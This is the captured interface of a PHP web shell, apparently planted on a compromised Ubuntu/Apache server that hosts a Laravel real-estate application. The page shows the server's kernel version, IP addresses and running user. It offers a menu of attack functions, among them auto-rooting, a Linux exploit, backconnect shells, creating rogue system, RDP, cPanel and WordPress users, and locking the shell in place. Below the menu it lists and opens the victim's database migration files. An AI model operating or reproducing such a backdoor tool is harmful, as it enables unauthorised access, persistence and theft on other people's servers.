Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.155.71
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
database /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
2014_10_12_000000_create_users...
751
B
-rwxr-xr-x
2014_10_12_100000_create_passw...
641
B
-rwxr-xr-x
2019_08_19_000000_create_faile...
768
B
-rwxr-xr-x
2019_12_14_000001_create_perso...
856
B
-rwxr-xr-x
2024_12_23_100203_create_permi...
6.4
KB
-rwxr-xr-x
2024_12_31_061725_first_name_l...
812
B
-rwxr-xr-x
2024_12_31_085634_add_deleted_...
570
B
-rwxr-xr-x
2024_12_31_100140_create_modul...
1.97
KB
-rwxr-xr-x
2025_01_07_083133_create_count...
535
B
-rwxr-xr-x
2025_01_08_102330_create_letti...
640
B
-rwxr-xr-x
2025_01_13_103603_create_occup...
615
B
-rwxr-xr-x
2025_01_13_121529_create_buy_t...
614
B
-rwxr-xr-x
2025_01_14_100039_add_type_to_...
646
B
-rwxr-xr-x
2025_01_15_054644_create_categ...
830
B
-rwxr-xr-x
2025_01_15_074718_create_branc...
4.1
KB
-rwxr-xr-x
2025_01_16_063647_create_direc...
1.76
KB
-rwxr-xr-x
2025_01_16_064513_create_direc...
1.06
KB
-rwxr-xr-x
2025_01_16_065245_create_prope...
1.11
KB
-rwxr-xr-x
2025_01_16_065543_create_alert...
1.13
KB
-rwxr-xr-x
2025_01_16_065858_create_direc...
966
B
-rwxr-xr-x
2025_01_16_101710_create_direc...
626
B
-rwxr-xr-x
2025_01_16_120021_add_branch_a...
1.09
KB
-rwxr-xr-x
2025_02_18_104826_add_notify_p...
1.32
KB
-rwxr-xr-x
2025_02_20_105210_create_prope...
493
B
-rwxr-xr-x
2025_02_20_105244_create_categ...
598
B
-rwxr-xr-x
2025_02_21_063006_create_speci...
699
B
-rwxr-xr-x
2025_02_21_125824_create_label...
543
B
-rwxr-xr-x
2025_02_24_073634_create_appli...
5.55
KB
-rwxr-xr-x
2025_02_24_074439_create_appli...
1.48
KB
-rwxr-xr-x
2025_02_24_074801_create_appli...
696
B
-rwxr-xr-x
2025_02_24_094819_add_notify_p...
602
B
-rwxr-xr-x
2025_02_24_123622_add_notify_p...
692
B
-rwxr-xr-x
2025_02_25_072347_add_area_add...
724
B
-rwxr-xr-x
2025_04_14_062543_create_landl...
4.08
KB
-rwxr-xr-x
2025_05_22_081446_create_landl...
1.54
KB
-rwxr-xr-x
2025_05_22_082419_create_landl...
781
B
-rwxr-xr-x
2025_06_03_112623_add_phase_to...
593
B
-rwxr-xr-x
2025_06_04_111405_change_categ...
918
B
-rwxr-xr-x
2025_06_05_062409_create_areas...
561
B
-rwxr-xr-x
2025_06_05_074021_create_posta...
573
B
-rwxr-xr-x
2025_06_05_102151_create_sourc...
567
B
-rwxr-xr-x
2025_06_10_081746_change_lha_d...
676
B
-rw-r--r--
2025_06_10_094130_change_able_...
588
B
-rw-r--r--
2025_06_10_101711_change_speci...
598
B
-rw-r--r--
2025_06_10_122443_update_prope...
690
B
-rw-r--r--
2025_06_11_063547_create_appli...
670
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2024_12_31_100140_create_modules_table.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; class CreateModulesTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('modules', function (Blueprint $table) { $table->id(); // Auto-incrementing primary key $table->string('name', 191); // Column for 'name' $table->string('unique_name', 191)->nullable(); // Nullable 'unique_name' $table->integer('order_no')->nullable(); // Nullable 'order_no' $table->enum('view', ['yes', 'no'])->default('no'); // Enum for 'view' column $table->enum('create', ['yes', 'no'])->default('no'); // Enum for 'create' column $table->enum('edit', ['yes', 'no'])->default('no'); // Enum for 'edit' column $table->enum('delete', ['yes', 'no'])->default('no'); // Enum for 'delete' column $table->enum('view_owned', ['yes', 'no'])->default('no'); // Enum for 'view_owned' column $table->enum('edit_owned', ['yes', 'no'])->default('no'); // Enum for 'edit_owned' column $table->enum('delete_owned', ['yes', 'no'])->default('no'); // Enum for 'delete_owned' column $table->enum('import', ['yes', 'no'])->default('no'); // Enum for 'import' column $table->enum('export', ['yes', 'no'])->default('no'); // Enum for 'export' column $table->enum('status', ['active', 'in-active'])->default('in-active'); // Enum for 'status' column $table->enum('default', ['yes', 'no'])->default('no'); // Enum for 'default' column $table->timestamps(0); // Created at and updated at columns $table->softDeletes(); // Soft delete column (deleted_at) }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('modules'); } }
Close